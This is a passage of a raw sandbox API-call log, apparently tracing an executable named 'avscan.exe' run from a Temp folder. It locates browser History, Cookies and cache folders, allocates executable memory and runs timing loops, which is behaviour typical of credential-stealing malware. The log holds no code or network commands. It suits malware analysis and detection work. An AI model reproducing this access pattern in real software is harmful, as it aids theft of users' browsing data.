pszPath=0x3341c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0121.219] SysReAllocStringLen (in: pbstr=0x28fd48*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fd48*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0121.219] SysReAllocStringLen (in: pbstr=0x28fd4c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0121.219] GetThreadLocale () returned 0x409 [0121.219] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.219] GetThreadLocale () returned 0x409 [0121.219] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.219] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", lpFilePart=0x28fa90*=0x0) returned 0x3b [0121.219] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0121.219] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0121.219] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchLength=0x3b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 0x3b [0121.220] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x28fd4c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0121.220] SysReAllocStringLen (in: pbstr=0x33325d4*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x33325d4*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0121.220] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0121.224] SysReAllocStringLen (in: pbstr=0x28fd3c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fd3c*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0121.224] SysReAllocStringLen (in: pbstr=0x28fd40*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0121.224] GetThreadLocale () returned 0x409 [0121.224] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.224] GetThreadLocale () returned 0x409 [0121.224] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.224] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpFilePart=0x28fa90*=0x0) returned 0x3d [0121.224] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0121.224] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0121.224] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchLength=0x3d | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 0x3d [0121.224] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x28fd40*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0121.225] SysReAllocStringLen (in: pbstr=0x33325d8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x33325d8*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0121.225] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0121.246] SysReAllocStringLen (in: pbstr=0x28fd30*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fd30*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0121.247] SysReAllocStringLen (in: pbstr=0x28fd34*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0121.247] GetThreadLocale () returned 0x409 [0121.247] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.247] GetThreadLocale () returned 0x409 [0121.247] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.247] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", lpFilePart=0x28fa90*=0x0) returned 0x4c [0121.247] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0121.247] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0121.247] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchLength=0x4c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 0x4c [0121.247] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x28fd34*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0121.248] SysReAllocStringLen (in: pbstr=0x33325dc*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x33325dc*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0121.248] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x3341c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0121.250] SysReAllocStringLen (in: pbstr=0x28fd24*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fd24*="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0121.251] SysReAllocStringLen (in: pbstr=0x28fd28*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0121.251] GetThreadLocale () returned 0x409 [0121.251] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0121.251] GetThreadLocale () returned 0x409 [0121.251] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0121.251] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", lpFilePart=0x28fa90*=0x0) returned 0x23 [0121.251] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0121.251] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0121.251] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchLength=0x23 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 0x23 [0121.251] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x28fd28*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0121.252] SysReAllocStringLen (in: pbstr=0x33325e0*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x33325e0*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0121.252] VirtualFree (lpAddress=0x3344000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0121.259] GetVersion () returned 0x1db10106 [0121.259] GetCurrentProcessId () returned 0xfd4 [0121.259] GetCurrentProcess () returned 0xffffffff [0121.259] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0121.259] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0121.260] GetCommandLineW () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0121.260] GetCommandLineW () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0121.260] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0121.320] RtlDosPathNameToNtPathName_U (in: DosPathName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", NtPathName=0x28fcd8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0121.320] NtCreateFile (in: FileHandle=0x28fce8, DesiredAccess=0x80100080, ObjectAttributes=0x28fcbc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x28fce0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x28fce8*=0xfc, IoStatusBlock=0x28fce0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0121.320] RtlFreeAnsiString (AnsiString="\\") [0121.385] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0121.444] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fef0, BufferLength=0x40, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fef0*) returned 0x0 [0121.521] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0121.521] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fedc, BufferLength=0x14, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fedc*) returned 0x0 [0121.522] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0121.522] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdfc, BufferLength=0xe0, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdfc*) returned 0x0 [0121.522] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0121.522] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0121.522] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0121.523] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0121.523] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0121.523] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0121.523] NtClose (Handle=0xfc) returned 0x0 [0121.607] GetLastError () returned 0x0 [0121.607] SetLastError (dwErrCode=0x0) [0121.686] GetLastError () returned 0x0 [0121.686] SetLastError (dwErrCode=0x0) [0121.686] GetLastError () returned 0x0 [0121.687] SetLastError (dwErrCode=0x0) [0121.687] GetLastError () returned 0x0 [0121.687] SetLastError (dwErrCode=0x0) [0122.050] GetCurrentThreadId () returned 0xfd8 [0122.050] VirtualAlloc (lpAddress=0x3344000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x40) returned 0x3344000 [0122.056] GetTickCount () returned 0x1d09842 [0122.056] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288447495) returned 1 [0122.056] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288477856) returned 1 [0122.058] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288639316) returned 1 [0122.058] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288647969) returned 1 [0122.058] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288660172) returned 1 [0122.058] Sleep (dwMilliseconds=0x0) [0122.060] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288888569) returned 1 [0122.061] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288900901) returned 1 [0122.061] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288919413) returned 1 [0122.061] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288934020) returned 1 [0122.061] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060288950619) returned 1 [0122.061] Sleep (dwMilliseconds=0x0) [0122.063] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060289185687) returned 1 [0122.064] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060289196202) returned 1 [0122.064] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060289209958) returned 1 [0122.064] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060289226014) returned 1 [0122.064] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060289240997) returned 1 [0122.064] Sleep (dwMilliseconds=0x0) [0122.070] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060289878793) returned 1 [0122.070] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060290040079) returned 1 [0122.072] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060290051886) returned 1 [0122.072] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060290062667) returned 1 [0122.072] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3060290079405) returned 1 [0122.072] Sleep (dwMilliseconds=0x0) [0122.073] GetTickCount () returned 0x1d09851 [0122.073] VirtualFree (lpAddress=0x3364000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0122.192] GetLastError () returned 0x0 [0122.192] SetLastError (dwErrCode=0x0) [0122.249] GetLastError () returned 0x0 [0122.249] SetLastError (dwErrCode=0x0) [0122.249] GetLastError () returned 0x0 [0122.249] SetLastError (dwErrCode=0x0) [0122.249] GetLastError () returned 0x0 [0122.249] SetLastError (dwErrCode=0x0) [0122.249] GetLastError () returned 0x0 [0122.249] SetLastError (dwErrCode=0x0) [0122.250] GetLastError () returned 0x0 [0122.250] SetLastError (dwErrCode=0x0) [0122.250] GetLastError () returned 0x0 [0122.250] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.308] GetLastError () returned 0x0 [0122.308] SetLastError (dwErrCode=0x0) [0122.369] GetLastError () returned 0x0 [0122.369] SetLastError (dwErrCode=0x0) [0122.369] GetLastError () returned 0x0 [0122.372] SetLastError (dwErrCode=0x0) [0122.372] GetLastError () returned 0x0 [0122.373] SetLastError (dwErrCode=0x0) [0122.373] GetLastError () returned 0x0 [0122.373] SetLastError (dwErrCode=0x0) [0122.373] GetLastError () returned 0x0 [0122.373] SetLastError (dwErrCode=0x0) [0122.373] GetLastError () returned 0x0 [0122.373] SetLastError (dwErrCode=0x0) [0122.373] GetLastError () returned 0x0 [0122.373] SetLastError (dwErrCode=0x0) [0122.374] GetLastError () returned 0x0 [0122.374] SetLastError (dwErrCode=0x0) [0122.374] GetLastError () returned 0x0 [0122.374] SetLastError (dwErrCode=0x0) [0122.432] GetLastError () returned 0x0 [0122.432] SetLastError (dwErrCode=0x0) [0122.432] GetLastError () returned 0x0 [0122.432] SetLastError (dwErrCode=0x0) [0122.432] GetLastError () returned 0x0 [0122.432] SetLastError (dwErrCode=0x0) [0122.432] GetLastError () returned 0x0 [0122.433] SetLastError (dwErrCode=0x0) [0122.492] GetLastError () returned 0x0 [0122.492] SetLastError (dwErrCode=0x0) [0122.492] GetLastError () returned 0x0 [0122.493] SetLastError (dwErrCode=0x0) [0122.494] GetLastError () returned 0x0 [0122.494] SetLastError (dwErrCode=0x0) [0122.494] GetLastError () returned 0x0 [0122.494] SetLastError (dwErrCode=0x0) [0122.552] GetLastError () returned 0x0 [0122.553] SetLastError (dwErrCode=0x0) [0122.553] GetLastError () returned 0x0 [0122.553] SetLastError (dwErrCode=0x0) [0122.553] GetLastError () returned 0x0 [0122.553] SetLastError (dwErrCode=0x0) [0122.610] GetLastError () returned 0x0 [0122.610] SetLastError (dwErrCode=0x0) [0122.610] GetLastError () returned 0x0 [0122.610] SetLastError (dwErrCode=0x0) [0122.611] GetLastError () returned 0x0 [0122.611] SetLastError (dwErrCode=0x0) [0122.611] GetLastError () returned 0x0 [0122.611] SetLastError (dwErrCode=0x0) [0122.671] VirtualAlloc (lpAddress=0x3364000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3364000 [0122.672] GetLastError () returned 0x0 [0122.673] SetLastError (dwErrCode=0x0) [0122.673] GetLastError () returned 0x0 [0122.673] SetLastError (dwErrCode=0x0) [0122.673] GetLastError () returned 0x0 [0122.673] SetLastError (dwErrCode=0x0) [0122.673] GetLastError () returned 0x0 [0122.673] SetLastError (dwErrCode=0x0) [0122.673] GetLastError () returned 0x0 [0122.674] SetLastError (dwErrCode=0x0) [0122.731] GetLastError () returned 0x0 [0122.731] SetLastError (dwErrCode=0x0) [0122.731] GetLastError () returned 0x0 [0122.731] SetLastError (dwErrCode=0x0) [0122.734] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0122.735] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0122.735] GetLastError () returned 0x0 [0122.735] SetLastError (dwErrCode=0x0) [0122.801] GetLastError () returned 0x0 [0122.801] SetLastError (dwErrCode=0x0) [0122.801] GetLastError () returned 0x0 [0122.801] SetLastError (dwErrCode=0x0) [0122.802] GetLastError () returned 0x0 [0122.802] SetLastError (dwErrCode=0x0) [0122.802] GetLastError () returned 0x0 [0122.802] SetLastError (dwErrCode=0x0) [0122.858] GetLastError () returned 0x0 [0122.859] SetLastError (dwErrCode=0x0) [0122.859] GetLastError () returned 0x0 [0122.859] SetLastError (dwErrCode=0x0) [0122.859] GetLastError () returned 0x0 [0122.859] SetLastError (dwErrCode=0x0) [0122.859] GetLastError () returned 0x0 [0122.859] SetLastError (dwErrCode=0x0) [0122.859] GetLastError () returned 0x0 [0122.860] SetLastError (dwErrCode=0x0) [0122.917] GetLastError () returned 0x0 [0122.917] SetLastError (dwErrCode=0x0) [0122.917] GetLastError () returned 0x0 [0122.917] SetLastError (dwErrCode=0x0) [0122.917] GetLastError () returned 0x0 [0122.918] SetLastError (dwErrCode=0x0) [0122.980] GetLastError () returned 0x0 [0122.980] SetLastError (dwErrCode=0x0) [0123.062] GetLastError () returned 0x0 [0123.062] SetLastError (dwErrCode=0x0) [0123.063] GetLastError () returned 0x0 [0123.063] SetLastError (dwErrCode=0x0) [0123.063] GetLastError () returned 0x0 [0123.063] SetLastError (dwErrCode=0x0) [0123.063] GetLastError () returned 0x0 [0123.064] SetLastError (dwErrCode=0x0) [0123.139] GetLastError () returned 0x0 [0123.140] SetLastError (dwErrCode=0x0) [0123.140] GetLastError () returned 0x0 [0123.140] SetLastError (dwErrCode=0x0) [0123.140] GetLastError () returned 0x0 [0123.140] SetLastError (dwErrCode=0x0) [0123.219] GetLastError () returned 0x0 [0123.219] SetLastError (dwErrCode=0x0) [0123.219] GetLastError () returned 0x0 [0123.220] SetLastError (dwErrCode=0x0) [0123.220] GetLastError () returned 0x0 [0123.220] SetLastError (dwErrCode=0x0) [0123.300] GetLastError () returned 0x0 [0123.301] SetLastError (dwErrCode=0x0) [0123.301] GetLastError () returned 0x0 [0123.301] SetLastError (dwErrCode=0x0) [0123.301] GetLastError () returned 0x0 [0123.302] SetLastError (dwErrCode=0x0) [0123.302] GetLastError () returned 0x0 [0123.302] SetLastError (dwErrCode=0x0) [0123.303] GetLastError () returned 0x0 [0123.303] SetLastError (dwErrCode=0x0) [0123.548] VirtualAlloc (lpAddress=0x3374000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x3374000 [0123.637] VirtualFree (lpAddress=0x3374000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0123.734] GetLastError () returned 0x0 [0123.734] SetLastError (dwErrCode=0x0) [0123.734] GetLastError () returned 0x0 [0123.734] SetLastError (dwErrCode=0x0) [0123.734] GetLastError () returned 0x0 [0123.734] SetLastError (dwErrCode=0x0) [0123.734] GetLastError () returned 0x0 [0123.734] SetLastError (dwErrCode=0x0) [0123.820] GetLastError () returned 0x0 [0123.820] SetLastError (dwErrCode=0x0) [0123.820] GetLastError () returned 0x0 [0123.821] SetLastError (dwErrCode=0x0) [0123.821] GetLastError () returned 0x0 [0123.821] SetLastError (dwErrCode=0x0) [0123.909] GetLastError () returned 0x0 [0123.909] SetLastError (dwErrCode=0x0) [0123.909] GetLastError () returned 0x0 [0123.909] SetLastError (dwErrCode=0x0) [0123.909] GetLastError () returned 0x0 [0123.910] SetLastError (dwErrCode=0x0) [0123.910] GetLastError () returned 0x0 [0123.910] SetLastError (dwErrCode=0x0) [0124.009] GetLastError () returned 0x0 [0124.009] SetLastError (dwErrCode=0x0) [0124.009] GetLastError () returned 0x0 [0124.010] SetLastError (dwErrCode=0x0) [0124.010] GetLastError () returned 0x0 [0124.010] SetLastError (dwErrCode=0x0) [0124.095] GetLastError () returned 0x0 [0124.095] SetLastError (dwErrCode=0x0) [0124.095] GetLastError () returned 0x0 [0124.095] SetLastError (dwErrCode=0x0) [0124.095] GetLastError () returned 0x0 [0124.095] 